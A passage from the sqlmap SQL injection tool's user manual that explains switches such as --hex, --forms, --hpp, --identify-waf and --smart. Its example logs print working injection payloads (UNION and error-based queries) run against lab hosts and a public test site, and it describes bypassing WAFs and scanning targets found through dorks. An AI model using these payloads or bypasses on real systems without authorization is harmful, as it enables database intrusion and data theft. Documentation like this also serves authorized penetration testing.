2015For proper decoding of character data sqlmap uses either web server provided information (e.g. HTTP header `Content-Type`) or a heuristic result coming from a 3rd party library [chardet](https://pypi.python.org/pypi/chardet).
2016
2017Nevertheless, there are cases when this value has to be overwritten, especially when retrieving data containing international non-ASCII letters (e.g. `--encoding=GBK`). It has to be noted that there is a possibility that character information is going to be irreversibly lost due to implicit incompatibility between stored database content and used database connector at the target side.
2018
2019### Estimated time of arrival
2020
2021Switch: `--eta`
2022
2023It is possible to calculate and show in real time the estimated time of arrival to retrieve each query output. This is shown when the technique used to retrieve the output is any of the blind SQL injection types.
2024
2025Example against an Oracle target affected only by boolean-based blind SQL injection:
2026
2027```
2028$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id\
2029=1" -b --eta
2030
2031[...]
2032[hh:mm:01] [INFO] the back-end DBMS is Oracle
2033[hh:mm:01] [INFO] fetching banner
2034[hh:mm:01] [INFO] retrieving the length of query output
2035[hh:mm:01] [INFO] retrieved: 64
203617% [========> ] 11/64 ETA 00:19
2037```
2038
2039Then:
2040
2041```
2042100% [===================================================] 64/64
2043[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2
2044.0.1.0 - Prod
2045
2046web application technology: PHP 5.2.6, Apache 2.2.9
2047back-end DBMS: Oracle
2048banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
2049```
2050
2051As you can see, sqlmap first calculates the length of the query output, then estimates the time of arrival, shows the progress in percentage and counts the number of retrieved output characters.
2052
2053### Flush session files
2054
2055Option: `--flush-session`
2056
2057As you are already familiar with the concept of a session file from the description above, it is good to know that you can flush the content of that file using option `--flush-session`. This way you can avoid the caching mechanisms implemented by default in sqlmap. Other possible way is to manually remove the session file(s).
2058
2059### Parse and test forms' input fields
2060
2061Switch: `--forms`
2062
2063Say that you want to test against SQL injections a huge _search form_ or you want to test a login bypass (typically only two input fields named like _username_ and _password_), you can either pass to sqlmap the request in a request file (`-r`), set the POSTed data accordingly (`--data`) or let sqlmap do it for you!
2064
2065Both of the above mentioned instances, and many others, appear as ` <form>` and ` <input>` tags in HTML response bodies and this is where this switch comes into play.
2066
2067Provide sqlmap with `--forms` as well as the page where the form can be found as the target URL (`-u`) and sqlmap will request the target URL for you, parse the forms it has and guide you through to test for SQL injection on those form input fields (parameters) rather than the target URL provided.
2068
2069### Ignore query results stored in session file
2070
2071Switch: `--fresh-queries`
2072
2073As you are already familiar with the concept of a session file from the description above, it is good to know that you can ignore the content of that file using option `--fresh-queries`. This way you can keep the session file untouched and for a selected run, avoid the resuming/restoring of queries output.
2074
2075### Use DBMS hex function(s) for data retrieval
2076
2077Switch: `--hex`
2078
2079In lost of cases retrieval of non-ASCII data requires special needs. One solution for that problem is usage of DBMS hex function(s). Turned on by this switch, data is encoded to it's hexadecimal form before being retrieved and afterwards unencoded to it's original form.
2080
2081Example against a PostgreSQL target:
2082
2083```
2084$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --b\
2085anner --hex -v 3 --parse-errors
2086
2087[...]
2088[xx:xx:14] [INFO] fetching banner
2089[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR
2090(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)
2091))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(
2092CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
2093[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'
2094>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type num
2095eric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d
2096676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c20284465626961
20976e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.p
2098hp</b> on line <b>35</b>'
2099[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
2100GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
2101[...]
2102```
2103
2104### Custom output directory path
2105
2106Option: `--output-dir`
2107
2108sqlmap by default stores session and result files inside a subdirectory `output`. In case you want to use a different location, you can use this option (e.g. `--output-dir=/tmp`).
2109
2110### Parse DBMS error messages from response pages
2111
2112Switch: `--parse-errors`
2113
2114If the web application is configured in debug mode so that it displays in the HTTP responses the back-end database management system error messages, sqlmap can parse and display them for you.
2115
2116This is useful for debugging purposes like understanding why a certain enumeration or takeover switch does not work - it might be a matter of session user's privileges and in this case you would see a DBMS error message along the lines of `Access denied for user <SESSION USER>`.
2117
2118Example against a Microsoft SQL Server target:
2119
2120```
2121$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
2122 --parse-errors
2123[...]
2124[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the
2125timeneeded to find the right number of query columns. Automatically extending th
2126e rangefor current UNION query injection technique test
2127[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
2128ers (0x80040E14)
2129[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 i
2130s out of range of the number of items in the select list.
2131<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
2132[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
2133ers (0x80040E14)
2134[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is
2135 out of range of the number of items in the select list.
2136<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
2137[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
2138ers (0x80040E14)
2139[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is
2140 out of range of the number of items in the select list.
2141<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
2142[xx:xx:17] [INFO] target URL appears to have 3 columns in query
2143[...]
2144```
2145
2146### Preprocess response data
2147
2148Option `--preprocess`
2149
2150Using this option it is possible to use a preprocessing script for (HTTP) response data prior being used by the sqlmap detection engine (e.g. to decode data or to remove junk). For example, preprocessing script that transforms all lowercase characters to uppercase could be:
2151
2152```
2153#!/usr/bin/env python
2154
2155def preprocess(page, headers=None, code=None):
2156 return page.upper() if page else page, headers, code
2157```
2158
2159### Save options in a configuration INI file
2160
2161Option: `--save`
2162
2163It is possible to save the command line options to a configuration INI file. The generated file can then be edited and passed to sqlmap with the `-c` option as explained above.
2164
2165### Update sqlmap
2166
2167Switch: `--update`
2168
2169Using this option you can update the tool to the latest development version directly from the [Git repository](https://github.com/sqlmapproject/sqlmap.git). You obviously need Internet access.
2170
2171If, for any reason, this operation fails, run `git pull` from your sqlmap working copy. It will perform the exact same operation of switch `--update`. If you are running sqlmap on Windows, you can use the [SmartGit](http://www.syntevo.com/smartgit/index.html) client.
2172
2173This is strongly recommended **before** reporting any bug to the [mailing lists](http://www.sqlmap.org/#ml).
2174
2175## Miscellaneous
2176
2177### Use short mnemonics
2178
2179Option: `-z`
2180
2181It could become tedious to type all desired options and switches, especially for those that are used most often (e.g. `--batch --random-agent --ignore-proxy --technique=BEU`). There is a simpler and much shorter way how to deal with that problem. In sqlmap it's called "mnemonics".
2182
2183Each option and switch can be written in a shorter mnemonic form using option `-z`, separated with a comma character (`,`), where mnemonics represent only the first arbitrarily chosen part of the original name. There is no strict mapping of options and switches to their respective shortened counterparts. Only required condition is that there is no other option nor switch that has a same prefix as the desired one.
2184
2185Example:
2186
2187```
2188$ python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "ww\
2189w.target.com/vuln.php?id=1"
2190```
2191
2192can be written (one of many ways) in shorter mnemonic form like:
2193
2194```
2195$ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=\
21961"
2197```
2198
2199Another example:
2200
2201```
2202$ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testd\
2203b -T users -u "www.target.com/vuln.php?id=1"
2204```
2205
2206can be written in shorter mnemonic form like:
2207
2208```
2209$ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.\
2210com/vuln.php?id=1"
2211```
2212
2213### Alerting on successful SQL injection detection
2214
2215Option: `--alert`
2216
2217### Make a beep sound when SQL injection is found
2218
2219Switch: `--beep`
2220
2221In case that user uses switch `--beep` he'll be warned with a beep sound immediately when SQL injection is found. This is especially useful when there is a large bulk list (option `-m`) of target URLs to be tested.
2222
2223### Cleanup the DBMS from sqlmap specific UDF(s) and table(s)
2224
2225Switch: `--cleanup`
2226
2227It is recommended to clean up the back-end database management system from sqlmap temporary table(s) (e.g. `sqlmapoutput`) and created user-defined function(s) when you are done taking over the underlying operating system or file system. Switch `--cleanup` will attempt to clean up the DBMS and the file system wherever possible.
2228
2229### Check for dependencies
2230
2231Switch: `--dependencies`
2232
2233sqlmap in some special cases requires independent installation of extra 3rd party libraries (e.g. options `-d`, switch `--os-pwn` in case of `icmpsh` tunneling, option `--auth-type` in case of `NTLM` HTTP authentication type, etc.) and it will warn the user only in such special cases. But, if you want to independently check for all those extra 3rd party library dependencies you can use switch `--dependencies`.
2234
2235```
2236$ python sqlmap.py --dependencies
2237[...]
2238[xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in
2239 order to directly connect to the DBMS Firebird. Download from http://kinterbasd
2240b.sourceforge.net/
2241[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
2242er to directly connect to the DBMS Sybase. Download from http://pymssql.sourcefo
2243rge.net/
2244[xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in ord
2245er to directly connect to the DBMS MySQL. Download from https://github.com/peteh
2246unt/PyMySQL/
2247[xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in o
2248rder to directly connect to the DBMS Oracle. Download from http://cx-oracle.sour
2249ceforge.net/
2250[xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in or
2251der to directly connect to the DBMS PostgreSQL. Download from http://initd.org/p
2252sycopg/
2253[xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in orde
2254r to directly connect to the DBMS IBM DB2. Download from http://code.google.com/
2255p/ibm-db/
2256[xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-pa
2257rty library in order to directly connect to the DBMS HSQLDB. Download from https
2258://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
2259[xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in orde
2260r to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.
2261googlecode.com/
2262[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
2263er to directly connect to the DBMS Microsoft SQL Server. Download from http://py
2264mssql.sourceforge.net/
2265[xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you pl
2266an to attack a web application behind NTLM authentication. Download from http://
2267code.google.com/p/python-ntlm/
2268[xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if y
2269ou plan to attack a web application using WebSocket. Download from https://pypi.
2270python.org/pypi/websocket-client/
2271```
2272
2273### Disable console output coloring
2274
2275Switch: `--disable-coloring`
2276
2277sqlmap by default uses coloring while writting to console. In case of undesired effects (e.g. console appearance of uninterpreted ANSI coloring codes like `\x01\x1b[0;32m\x02[INFO]`) you can disable console output coloring by using this switch.
2278
2279### Use Google dork results from specified page number
2280
2281Option: `--gpage`
2282
2283Default sqlmap behavior with option `-g` is to do a Google search and use the first 100 resulting URLs for further SQL injection testing. However, in combination with this option you can specify with this option (`--gpage`) a page other than the first one to retrieve target URLs from.
2284
2285### Use HTTP parameter pollution
2286
2287Switch: `--hpp`
2288
2289HTTP parameter pollution (HPP) is a method for bypassing WAF/IPS protection mechanisms (explained [here](https://www.imperva.com/resources/glossary/http-parameter-pollution)) that is particularly effective against ASP/IIS and ASP.NET/IIS platforms. If you suspect that the target is behind such protection, you can try to bypass it by using this switch.
2290
2291### Make a thorough testing for a WAF/IPS protection
2292
2293Switch: `--identify-waf`
2294
2295sqlmap can try to identify backend WAF/IPS protection (if any) so user could do appropriate steps (e.g. use tamper scripts with `--tamper`). Currently around 30 different products are supported (Airlock, Barracuda WAF, etc.) and their respective WAF scripts can be found inside `waf` directory.
2296
2297Example against a MySQL target protected by the ModSecurity WAF:
2298
2299```
2300$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --i\
2301dentify-waf -v 3
2302[...]
2303[xx:xx:23] [INFO] testing connection to the target URL
2304[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
2305[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS protection
2306[xx:xx:23] [DEBUG] checking for WAF/IPS product 'USP Secure Entry Server (Un
2307ited Security Providers)'
2308[xx:xx:23] [DEBUG] checking for WAF/IPS product 'BinarySEC Web Application F
2309irewall (BinarySEC)'
2310[xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetContinuum Web Applicatio
2311n Firewall (NetContinuum/Barracuda Networks)'
2312[xx:xx:23] [DEBUG] checking for WAF/IPS product 'Hyperguard Web Application
2313Firewall (art of defence Inc.)'
2314[xx:xx:23] [DEBUG] checking for WAF/IPS product 'Cisco ACE XML Gateway (Cisc
2315o Systems)'
2316[xx:xx:23] [DEBUG] checking for WAF/IPS product 'TrafficShield (F5 Networks)
2317'
2318[xx:xx:23] [DEBUG] checking for WAF/IPS product 'Teros/Citrix Application Fi
2319rewall Enterprise (Teros/Citrix Systems)'
2320[xx:xx:23] [DEBUG] checking for WAF/IPS product 'KONA Security Solutions (Ak
2321amai Technologies)'
2322[xx:xx:23] [DEBUG] checking for WAF/IPS product 'Incapsula Web Application F
2323irewall (Incapsula/Imperva)'
2324[xx:xx:23] [DEBUG] checking for WAF/IPS product 'CloudFlare Web Application
2325Firewall (CloudFlare)'
2326[xx:xx:23] [DEBUG] checking for WAF/IPS product 'Barracuda Web Application F
2327irewall (Barracuda Networks)'
2328[xx:xx:23] [DEBUG] checking for WAF/IPS product 'webApp.secure (webScurity)'
2329[xx:xx:23] [DEBUG] checking for WAF/IPS product 'Proventia Web Application S
2330ecurity (IBM)'
2331[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
2332[xx:xx:23] [DEBUG] page not found (404)
2333[xx:xx:23] [DEBUG] checking for WAF/IPS product 'KS-WAF (Knownsec)'
2334[xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetScaler (Citrix Systems)'
2335[xx:xx:23] [DEBUG] checking for WAF/IPS product 'Jiasule Web Application Fir
2336ewall (Jiasule)'
2337[xx:xx:23] [DEBUG] checking for WAF/IPS product 'WebKnight Application Firew
2338all (AQTRONIX)'
2339[xx:xx:23] [DEBUG] checking for WAF/IPS product 'AppWall (Radware)'
2340[xx:xx:23] [DEBUG] checking for WAF/IPS product 'ModSecurity: Open Source We
2341b Application Firewall (Trustwave)'
2342[xx:xx:23] [CRITICAL] WAF/IPS identified 'ModSecurity: Open Source Web Appli
2343cation Firewall (Trustwave)'. Please consider usage of tamper scripts (option '-
2344-tamper')
2345[...]
2346```
2347
2348Skip heuristic detection of WAF/IPS protection
2349
2350Switch: `--skip-waf`
2351
2352By default, sqlmap automatically sends inside one of starting requests a dummy parameter value containing a deliberately "suspicious" SQL injection payload (e.g. `...&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1`). If target responds differently than for the original request, there is a high possibility that it's under some kind of protection. In case of any problems, user can disable this mechanism by providing switch `--skip-waf`.
2353
2354### Imitate smartphone
2355
2356Switch: `--mobile`
2357
2358Sometimes web servers expose different interfaces toward mobile phones than to desktop computers. In such cases you can enforce usage of one of predetermined smartphone HTTP User-Agent header values. By using this switch, sqlmap will ask you to pick one of popular smartphones which it will imitate in current run.
2359
2360Example run:
2361
2362```
2363$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
2364[...]
2365which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
2366[1] Apple iPhone 4s (default)
2367[2] BlackBerry 9900
2368[3] Google Nexus 7
2369[4] HP iPAQ 6365
2370[5] HTC Sensation
2371[6] Nokia N97
2372[7] Samsung Galaxy S
2373> 1
2374[...]
2375```
2376
2377### Work in offline mode (only use session data)
2378
2379Switch: `--offline`
2380
2381By using switch `--offline` sqlmap will use only previous session data in data enumeration. This basically means that there will be zero connection attempts during such run.
2382
2383### Safely remove all content from data directory
2384
2385Switch `--purge`
2386
2387In case that user decides to safely remove all content from sqlmap's data directory (e.g. `$HOME/.local/share/sqlmap`), containing all target details from previous sqlmap runs, he can use switch `--purge`. While purging, all files from (sub)directories in data folder will be overwritten with random data, truncated, renamed to random names, (sub)directories will be renamed to random names too, and finally the whole directory tree will be deleted.
2388
2389Example run:
2390
2391```
2392$ python sqlmap.py --purge -v 3
2393[...]
2394[xx:xx:55] [INFO] purging content of directory '/home/testuser/.local/share/sqlmap'...
2395[xx:xx:55] [DEBUG] changing file attributes
2396[xx:xx:55] [DEBUG] writing random data to files
2397[xx:xx:55] [DEBUG] truncating files
2398[xx:xx:55] [DEBUG] renaming filenames to random values
2399[xx:xx:55] [DEBUG] renaming directory names to random values
2400[xx:xx:55] [DEBUG] deleting the whole directory tree
2401[...]
2402```
2403
2404### Conduct thorough tests only if positive heuristic(s)
2405
2406Switch `--smart`
2407
2408There are cases when user has a large list of potential target URLs (e.g. provided with option `-m`) and he wants to find a vulnerable target as fast as possible. If switch `--smart` is used, only parameters with which DBMS error(s) can be provoked, are being used further in scans. Otherwise they are skipped.
2409
2410Example against a MySQL target:
2411
2412```
2413$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&use\
2414r=foo&id=1" --batch --smart
2415[...]
2416[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
2417[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
2418[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might
2419not be injectable
2420[xx:xx:14] [INFO] skipping GET parameter 'ca'
2421[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
2422[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
2423[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' migh
2424t not be injectable
2425[xx:xx:14] [INFO] skipping GET parameter 'user'
2426[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
2427[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
2428[xx:xx:14] [INFO] GET parameter 'id' is dynamic
2429[xx:xx:14] [WARNING] reflective value(s) found and filtering out
2430[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
2431injectable (possible DBMS: 'MySQL')
2432[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
2433heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you
2434want to skip test payloads specific for other DBMSes? [Y/n] Y
2435do you want to include all tests for 'MySQL' extending provided level (1) and ri
2436sk (1)? [Y/n] Y
2437[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
2438[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
2439NG clause' injectable
2440[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2441'
2442[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
2443 HAVING clause' injectable
2444[xx:xx:14] [INFO] testing 'MySQL inline queries'
2445[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
2446[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
2447[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
2448[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
2449jectable
2450[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
2451[xx:xx:24] [INFO] automatically extending ranges for UNION query injection techn
2452ique tests as there is at least one other potential injection technique found
2453[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the
2454time needed to find the right number of query columns. Automatically extending t
2455he range for current UNION query injection technique test
2456[xx:xx:24] [INFO] target URL appears to have 3 columns in query
2457[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
2458mns' injectable
2459[...]
2460```
2461
2462### Select (or skip) tests by payloads and/or titles
2463
2464Option `--test-filter`
2465
2466In case that you want to filter tests by their payloads and/or titles you can use this option. For example, if you want to test all payloads which have `ROW` keyword inside, you can use `--test-filter=ROW`.
2467
2468Example against a MySQL target:
2469
2470```
2471$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --b\
2472atch --test-filter=ROW
2473[...]
2474[xx:xx:39] [INFO] GET parameter 'id' is dynamic
2475[xx:xx:39] [WARNING] reflective value(s) found and filtering out
2476[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
2477injectable (possible DBMS: 'MySQL')
2478[xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
2479[xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
2480'
2481[xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or
2482 HAVING clause' injectable
2483GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
2484)? [y/N] N
2485sqlmap identified the following injection points with a total of 3 HTTP(s) reque
2486sts:
2487---
2488Place: GET
2489Parameter: id
2490 Type: error-based
2491 Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
2492 Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELEC
2493T (C
2494 ASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FRO
2495M (S
2496 ELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY
2497x)
2498---
2499[...]
2500```
2501
2502Option `--test-skip=TEST`
2503
2504In case that you want to skip tests by their payloads and/or titles you can use this option. For example, if you want to skip all payloads which have `BENCHMARK` keyword inside, you can use `--test-skip=BENCHMARK`.
2505
2506### Interactive sqlmap shell
2507
2508Switch: `--sqlmap-shell`
2509
2510By using switch `--sqlmap-shell` user will be presented with the interactive sqlmap shell which has the history of all previous runs with used options and/or switches:
2511
2512```
2513$ python sqlmap.py --sqlmap-shell
2514sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=\
2515BEU --batch
2516 _
2517 ___ ___| |_____ ___ ___ {1.0-dev-2188502}
2518|_ -| . | | | .'| . |
2519|___|_ |_|_|_|_|__,| _|
2520 |_| |_| http://sqlmap.org
2521
2522[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
2523 consent is illegal. It is the end user's responsibility to obey all applicable
2524local, state and federal laws. Developers assume no liability and are not respon
2525sible for any misuse or damage caused by this program
2526
2527[*] starting at xx:xx:11
2528
2529[xx:xx:11] [INFO] testing connection to the target URL
2530[xx:xx:12] [INFO] testing if the target URL is stable
2531[xx:xx:13] [INFO] target URL is stable
2532[xx:xx:13] [INFO] testing if GET parameter 'artist' is dynamic
2533[xx:xx:13] [INFO] confirming that GET parameter 'artist' is dynamic
2534[xx:xx:13] [INFO] GET parameter 'artist' is dynamic
2535[xx:xx:13] [INFO] heuristic (basic) test shows that GET parameter 'artist' might
2536 be injectable (possible DBMS: 'MySQL')
2537[xx:xx:13] [INFO] testing for SQL injection on GET parameter 'artist'
2538it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
2539ecific for other DBMSes? [Y/n] Y
2540for the remaining tests, do you want to include all tests for 'MySQL' extending
2541provided level (1) and risk (1) values? [Y/n] Y
2542[xx:xx:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
2543[xx:xx:13] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind -
2544WHERE or HAVING clause' injectable
2545[xx:xx:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
2546Y or GROUP BY clause'
2547[xx:xx:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
2548 or GROUP BY clause'
2549[xx:xx:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
2550Y or GROUP BY clause (EXTRACTVALUE)'
2551[xx:xx:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
2552 or GROUP BY clause (EXTRACTVALUE)'
2553[xx:xx:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
2554Y or GROUP BY clause (UPDATEXML)'
2555[xx:xx:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
2556 or GROUP BY clause (UPDATEXML)'
2557[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
2558Y or GROUP BY clause (EXP)'
2559[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
2560XP)'
2561[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
2562Y or GROUP BY clause (BIGINT UNSIGNED)'
2563[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
2564IGINT UNSIGNED)'
2565[xx:xx:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
2566Y or GROUP BY clause'
2567[xx:xx:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
2568[xx:xx:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
2569[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
2570VALUE)'
2571[xx:xx:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
2572[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
2573VALUE)'
2574[xx:xx:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
2575ML)'
2576[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
2577[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
2578UNSIGNED)'
2579[xx:xx:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
2580[xx:xx:15] [INFO] automatically extending ranges for UNION query injection techn
2581ique tests as there is at least one other (potential) technique found
2582[xx:xx:15] [INFO] ORDER BY technique seems to be usable. This should reduce the
2583time needed to find the right number of query columns. Automatically extending t
2584he range for current UNION query injection technique test
2585[xx:xx:15] [INFO] target URL appears to have 3 columns in query
2586[xx:xx:16] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 2
25870 columns' injectable
2588GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if
2589 any)? [y/N] N
2590sqlmap identified the following injection point(s) with a total of 39 HTTP(s) re
2591quests:
2592---
2593Parameter: artist (GET)
2594 Type: boolean-based blind
2595 Title: AND boolean-based blind - WHERE or HAVING clause
2596 Payload: artist=1 AND 5707=5707
2597
2598 Type: UNION query
2599 Title: Generic UNION query (NULL) - 3 columns
2600 Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
260126d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
2602NULL,NULL-- -
2603---
2604[xx:xx:16] [INFO] testing MySQL
2605[xx:xx:16] [INFO] confirming MySQL
2606[xx:xx:16] [INFO] the back-end DBMS is MySQL
2607web application technology: Nginx, PHP 5.3.10
2608back-end DBMS: MySQL >= 5.0.0
2609[xx:xx:16] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
2610p/output/testphp.vulnweb.com'
2611sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
2612 _
2613 ___ ___| |_____ ___ ___ {1.0-dev-2188502}
2614|_ -| . | | | .'| . |
2615|___|_ |_|_|_|_|__,| _|
2616 |_| |_| http://sqlmap.org
2617
2618[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
2619 consent is illegal. It is the end user's responsibility to obey all applicable
2620local, state and federal laws. Developers assume no liability and are not respon
2621sible for any misuse or damage caused by this program
2622
2623[*] starting at xx:xx:25
2624
2625[xx:xx:26] [INFO] resuming back-end DBMS 'mysql'
2626[xx:xx:26] [INFO] testing connection to the target URL
2627sqlmap resumed the following injection point(s) from stored session:
2628---
2629Parameter: artist (GET)
2630 Type: boolean-based blind
2631 Title: AND boolean-based blind - WHERE or HAVING clause
2632 Payload: artist=1 AND 5707=5707
2633
2634 Type: UNION query
2635 Title: Generic UNION query (NULL) - 3 columns
2636 Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
263726d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
2638NULL,NULL-- -
2639---
2640[xx:xx:26] [INFO] the back-end DBMS is MySQL
2641[xx:xx:26] [INFO] fetching banner
2642web application technology: Nginx, PHP 5.3.10
2643back-end DBMS operating system: Linux Ubuntu
2644back-end DBMS: MySQL 5
2645banner: '5.1.73-0ubuntu0.10.04.1'
